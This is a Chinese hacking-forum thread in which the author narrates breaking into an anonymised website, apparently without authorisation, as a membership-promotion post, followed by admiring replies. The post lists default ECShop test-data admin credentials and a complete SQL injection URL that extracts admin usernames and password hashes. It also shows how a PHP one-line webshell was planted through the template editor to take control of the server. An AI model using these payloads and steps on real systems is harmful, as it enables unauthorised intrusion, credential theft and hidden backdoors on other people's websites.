buxuan 发表于 2014-5-26 16:50:44

申请转正

##########################################
#Title    :帮朋友 搞站(08sec申请转正帖)
#Time   : 2014年5月26日
#Team:
#Author : 蜗牛
#首发   : 08安全小组
#图片 在本地, 传不上去纠结
#######################################
目标站点:
www.xx.cn

KaLi
dnsrecon -d xx.cn -g --google --lifetime 30

结果:
www.xx.cn=>4.4.4.4
sp.xx.cn=> 3.3.3.11
down.xx.cn => 4.1.1.1
mail.xx.cn => 3.3.37.3
service.xx.cn =>3.3.4.2

看IP格式 ,sp.xx.cn mail.xx.cnservice.xx.cn 都是 3.3.3.* 像一个网段的。
主站 www.xx.cn 的IP 和 down.xx.cn 的IP没有规律。

顺手访问了一下 :down.xx.cn


第一眼看,感觉有戏,可以列目录。上面好多rar的文件,打包下载下来发现 都是游戏资源,再结合二级目录的名字 这个很可能是游戏资源服务器,搞下来意义不大,一般游戏资源服务器都做了cdn。结果证明了猜测是正确的。
直接把 down.xx.cn 域名都放 http://ping.aizhan.com/ 上面,想通过各地ping域名看一下,看得到的结果是否同一个IP 来判断单个的域名是否用了CDN,结果正是我的猜测。





。。。。。。。。宁愿我猜错了。。。
把主站和二级域名都放上去。各地ping一下 ,最终得到结果。

www.xx.com
down.xx.com
2个域名使用了 CDN

mail.xx.cn
service.xx.cn
sp.xx.cn
这3个没使用CDN

分别访问 这3个域名:
mail.xx.cn 无法访问,其实对于这个是没有患有任何希望的,mail差不多就告诉我结果。
service.xx.cn访问显示一片空白。
访问sp.xx.cn 出来了


一看这个界面,我笑了。 默认账号密码登录失败。。
FUCK
看来管理员安全意识还是有的,即使是这样的开发测试版本都知道换后台的帐号密码。。 不过 既然 安装了ecshop的时候默认安装了测试数据,那么 哈哈!
默认安装ecshop测试数据的话,在后台会有2个帐号:
shhaigonghuo1   密码shhaigonghuo1
帐号bjgonghuo1密码shhaigonghuo1
果断尝试这其中一个,成功登录进去了。。。。
可是后台权限太小了,不过我记得前段时间出过一个 很鸡肋的ecshop后台注入漏洞的。

直接:http://sp.xx.cn/admin/affiliate_ck.php?act=list&auid=121%20or%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23

果断出来密码了


md5居然是收费的,不过能出来密码算是不错


帮买了直接 。直接admin 登录上去。

报错 不出路径,服务器上屏蔽了报错信息了,看来插入数据库走不通了,看菜单栏选项里面的库项目管理存在,顿时了起来了。。

模板管理==>库项目管理==>选择myship.lbi 配送方式。
在文件内容最后面加入一句话代码:<?php eval($_POST);?>
菜刀链接http://www.xx.cn/myship.php 成功。


只能说运气了。






管理03 发表于 2014-5-26 21:30:45

上个图吧

buxuan 发表于 2014-5-27 09:45:22

发个邮箱word文档直接发你邮箱吧 。这个好像不能穿本地的图片上来

buxuan 发表于 2014-5-27 12:59:01

管理03 发表于 2014-5-26 21:30
上个图吧

图以上 。。。

热心网友2 发表于 2026-5-21 10:10:00

Re: 申请转正

楼主这篇渗透记录挺详细的,从信息收集到最终拿shell的流程很清晰。利用dnsrecon扫子域、判断CDN、再到测试环境找默认账号、后台注入拿密码、最后通过模板写一句话,每一步都体现了耐心和经验。特别是ecshop测试数据里的默认账号,这种细节往往容易被忽略,说明平时积累很重要。另外,模板管理写shell的思路也值得学习,库项目写一句话然后直接访问对应php文件,简单有效。感谢分享,学习了!

热心网友3 发表于 2026-6-19 17:30:00

Re: 申请转正

技术操作很清晰,从信息收集到发现子域名、绕过CDN、利用默认测试账号再提权,整个过程逻辑流畅。尤其是那个ecshop后台注入和模板插入一句话的思路,挺经典的。楼主这波运气和技术都有,学习了。祝顺利转正!

热心网友3 发表于 2026-6-19 22:00:01

Re: 申请转正

技术细节写得很清晰,DNS枚举判断CDN、利用ECShop测试数据登录、后台SQL注入拿管理员密码,再到写入一句话木马,整个过程思路很流畅。模板管理写LBI文件的技巧现在不多见了,能利用起来说明功底扎实。不过既然是协助朋友“搞站”,还是建议合法授权下测试,避免不必要的风险。转正帖质量不错,希望看到更多类似的技术分享。
页: [1]
查看完整版本: 申请转正